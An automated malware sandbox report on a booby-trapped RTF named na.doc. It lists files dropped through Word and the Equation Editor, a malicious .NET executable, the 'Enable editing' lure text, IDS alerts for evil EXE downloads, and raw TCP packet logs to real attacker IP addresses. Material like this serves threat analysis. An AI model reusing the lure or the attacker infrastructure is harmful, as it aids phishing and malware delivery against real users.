Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9244FB79-8087-48F4-9601-4648A0A2E0FE}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.3565081771358332
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbe:IiiiiiiiiifdLloZQc8++lsJe1Mzvl/n
MD5:	3CC91391A7A87FEB8D10811C00864F28
SHA1:	A766ADDD435F536303C7BA630FCB4E79D94F5F63
SHA-256:	072A92633BC66E1B87B19244DDCF948D0A82CAD555B06020ABF14483CE0BDFD6
SHA-512:	8D9CF2B38E70558D4270949FE90D42ECF0B3C1FF66445CB171D0ACBB197F06C5AB0DE85BF37879FEE9D9C7F91F1270DF460FB2A15BA5F6119C69170B113E545C
Malicious:	false
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C29027CA-DA85-475F-B543-7A91F61DAD71}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	4070956
Entropy (8bit):	3.3864404248495794
Encrypted:	false
SSDEEP:	6144:Pyemryemryemryemryemryemryemryemryemryemryemryemryemryemryemryec:D
MD5:	3BD3C6845B2AB7EB5FC420109CDF0C2B
SHA1:	596A78A43DCDB40A10A9CA706449D88C060D76B4
SHA-256:	96C7B7C567DFA4DE25544FC6A96C010DD6ED88FFA27B73A65351BCAF291F2526
SHA-512:	824E19D86D00EBCB2E87251E81054DE904E2B5EA78E0D6F4827FAF3414B88E6B2D50B2DFFD10767B3467C91E13036FFEFC57F377E5EF12745E53174B3705AE0C
Malicious:	false
Preview:	8.0.9.2.5.9.8.4.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .

C:\Users\user\AppData\Local\Temp\2wnpsfdz.zui.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\vrbipaey.i1k.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Generic INItialization configuration [folders]
Category:	dropped
Size (bytes):	38
Entropy (8bit):	4.195295934496219
Encrypted:	false
SSDEEP:	3:M19m42Uv:M9
MD5:	85AFAECA1F119568BFA70BB4ED76F108
SHA1:	13DA0EB4D0361D0A4CD1DD38DBECA56DEB273457
SHA-256:	3211DF2212BAF22DF462140F37EC16A81483BFB4DE4796F24A0708390601F0F8
SHA-512:	4E5C577D753BF15471DA27D3EEE34FCE86E388414FA1177E3BCF877827C82750F23C8EDB64B83CF7E55C69D5FCB2BD18941E81A353F8458A0685D358C1E9D3A6
Malicious:	false
Preview:	[doc]..na.LNK=0..[folders]..na.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\na.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:07 2023, mtime=Fri Aug 11 15:42:07 2023, atime=Wed Oct 30 06:24:57 2024, length=2531309, window=hide
Category:	dropped
Size (bytes):	968
Entropy (8bit):	4.533666417962186
Encrypted:	false
SSDEEP:	12:8S3bEE0gXg/XAlCPCHaXSk5B4ggB/BGFX+WdJoNmicvbeI8DtZ3YilMMEpxRljKO:8S31k/XTiKybkPJWeaDDv3qr1q57u
MD5:	F039673B3EB235E7482B174B39EE8FD7
SHA1:	A77563698D25C6D61FCAF3700230C3642D52A322
SHA-256:	0AB77EF37AAB422E9B13F3BAEDDAE10C25E840BB696D1541F266AD03DE3526B2
SHA-512:	6E3C055D2A07072AC2A967E9E9BB223912D506CC6F5AF4680A0C83A6613FB055120DDCDBF0ED3686ADCF61A2548F0BC935287A3C32A9B489217E782EBC97E788
Malicious:	false
Preview:	L..................F.... ...w.].r...w.].r..........&..........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....^Y.;..user.8......QK.X^Y.;...&=....U...............A.l.b.u.s.....z.1......WE...Desktop.d......QK.X.WE...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....P.2..&.^Y.; .na.doc..:.......WD..WD.*.........................n.a...d.o.c.......p...............-...8...[............?J......C:\Users\..#...................\\128757\Users.user\Desktop\na.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.n.a...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......128757..........D_....3N...W...9..W.e8...8.....[D_....3N...W...9..W.e8...8.....[....

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
MD5:	2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
SHA1:	95E13378EA9CACA068B2687F01E9EF13F56627C2
SHA-256:	60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
SHA-512:	2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Unicode text, UTF-16, little-endian text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	755712
Entropy (8bit):	7.949773362732047
Encrypted:	false
SSDEEP:	12288:MlaDPw1Qk89Tmy18IAAM4d8bKDIy/8GelBse0cf9c8HuFSP6px4pBCBOVsppbQ8c:MsLw9gTFSN4SbsI8KBocmQPkxY8OVs78
MD5:	06A6B60A72D4C7A394B8345EE8047851
SHA1:	3954D8D9B1FBC4B45C6B94C3B7D6901AEE7E350A
SHA-256:	518B7B68A0D659F27A704C2976F7027987DBA584696F96B89653786C504B8D70
SHA-512:	D667BA592819119C4BFC0CFE93ABEE5D410714859F479EE30B911CB130839F30AF2071A2EAC84F9E630433F80D243D47841D9F47D034CAFC8BD33CE2127DE05E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....!g..............0..l............... ........@.. ....................................@.................................P...O....... ............................................................................ ............... ..H............text....j... ...l.................. ..`.rsrc... ............n..............@..@.reloc..............................@..B........................H........q...g...........................................................0...........(......(.....+.....0...........(.......(.....+....0...........(........(.....+...0...........(.........(.....+......0...........(...........(.....+....0...........(.............(.....+......0.................(.......(.....+......0.................(........(.....+.....0.................(.........(.....+....0.................(...........( ....+......0.................(.............(!.

C:\Users\user\Desktop\~$na.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
MD5:	2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
SHA1:	95E13378EA9CACA068B2687F01E9EF13F56627C2
SHA-256:	60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
SHA-512:	2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
Malicious:	true
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General

File type:	Nim source code, Non-ISO extended-ASCII text, with very long lines (65429), with CR line terminators
Entropy (8bit):	4.830024696757051
TrID:	Rich Text Format (4004/1) 100.00%
File name:	na.doc
File size:	2'531'309 bytes
MD5:	17fbc6bf368de449e0afb59ff45af1fd
SHA1:	f4522ebabac9835ecdad5137fa00b185ecbef04c
SHA256:	8c53c38be598e4c508023f712a8b0d84b13ddfd65cbe17ef33a8200d26881f7a
SHA512:	945994d9ca26a0ff691814c25e4fcb5ba9d8b57f14b17ccce0d0c9a77582ace96ed5f53b16ebafb51b3293f98ca2a0c1ea03c26bcc9fa9d4be1d93c0debcf145
SSDEEP:	6144:OwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAp:r0
TLSH:	FCC5363DD34A025D8F630276EF561E5142BDBA7EF38552A1302C537933EAC39A1252BE
File Content Preview:	{\rt..{\*\ogFhkacUsyQU1Qh2QENywzToKQdBxTraibbH5MxXaHD4OrajG0IUZUlcsqA8MTCXut5j5NpDfjlc9SHIlyrKWIMlflU0HC}..{\780925984please click Enable editing from the yellow bar above.The independent auditors. opinion says the financial statements are fairly stated i

File Icon


Icon Hash:	2764a3aaaeb7bdbf

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-30T08:25:03.736440+0100	2022050	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1	1	87.120.84.38	80	192.168.2.22	49163	TCP
2024-10-30T08:25:03.910796+0100	2022051	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2	1	87.120.84.38	80	192.168.2.22	49163	TCP
2024-10-30T08:25:03.910796+0100	2827449	ETPRO EXPLOIT Adobe EMF File Memory Corrpution Vulnerability Inbound (CVE-2017-3123)	1	87.120.84.38	80	192.168.2.22	49163	TCP
2024-10-30T08:25:15.954394+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.22	49164	193.122.6.168	80	TCP
2024-10-30T08:25:19.302467+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.22	49164	193.122.6.168	80	TCP
2024-10-30T08:25:19.864564+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.22	49166	188.114.96.3	443	TCP
2024-10-30T08:25:20.954242+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.22	49167	193.122.6.168	80	TCP
2024-10-30T08:25:27.981705+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.22	49170	188.114.97.3	443	TCP
2024-10-30T08:25:30.692758+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.22	49172	188.114.97.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 30, 2024 08:25:02.784600973 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:02.790010929 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:02.790086985 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:02.790302038 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:02.795593023 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.736092091 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.736114025 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.736125946 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.736191988 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:03.736398935 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:03.736439943 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.736452103 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.736463070 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.736474037 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.736486912 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.736495018 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:03.736500978 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.736514091 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.736516953 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:03.736527920 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:03.736552954 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:03.741626978 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.741657019 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.741668940 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.741681099 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.741734028 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:03.742419958 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:03.742583990 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:03.905164957 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.905184984 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.905194998 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.905229092 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:03.905261993 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.905273914 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.905293941 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:03.905327082 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:03.905482054 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.905502081 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.905539989 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:03.905565023 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.905575037 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.905606985 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:03.906153917 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.906171083 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.906200886 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:03.906213999 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:03.906313896 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.906373978 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.906383038 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:03.906385899 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.906413078 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:03.906413078 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.906419992 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:03.906424999 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.906461954 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:03.907222033 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.907274008 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:03.907289982 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.907300949 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.907316923 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.907330036 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.907365084 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:03.907390118 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:03.908113003 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.908143044 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.908154011 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.908154964 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:03.908185005 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:03.910795927 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.910805941 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:03.910847902 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.074204922 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.074234962 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.074271917 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.074311972 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.074331999 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.074351072 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.074387074 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.074400902 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.074400902 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.074400902 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.074400902 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.074424982 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.074424982 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.074450016 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.074485064 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.074487925 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.074506044 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.074548006 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.074676991 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.074697018 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.074732065 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.074780941 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.074805021 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.074810028 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.074827909 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.074834108 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.074853897 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.074856997 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.074906111 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.075053930 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.075073957 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.075082064 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.075103045 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.075109959 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.075141907 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.075185061 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.075201988 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.075231075 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.075252056 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.075252056 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.075277090 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.075278044 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.075292110 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.075385094 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.075582981 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.075593948 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.075606108 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.075648069 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.075650930 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.075663090 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.075675011 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.075695038 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.075728893 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.075773001 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.075783014 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.075819969 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.076131105 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.076143026 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.076180935 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.076199055 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.076210976 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.076221943 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.076232910 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.076246977 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.076253891 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.076292992 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.076569080 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.076615095 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.076669931 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.076731920 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.076742887 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.076754093 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.076764107 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.076777935 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.076795101 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.076895952 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.076906919 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.076915979 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.076926947 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.076939106 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.076944113 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.076950073 CET	80	49163	87.120.84.38	192.168.2.22
Oct 30, 2024 08:25:04.076955080 CET	49163	80	192.168.2.22	87.120.84.38
Oct 30, 2024 08:25:04.076962948 CET	80	49163	87.120.84.38	192.168.2.22
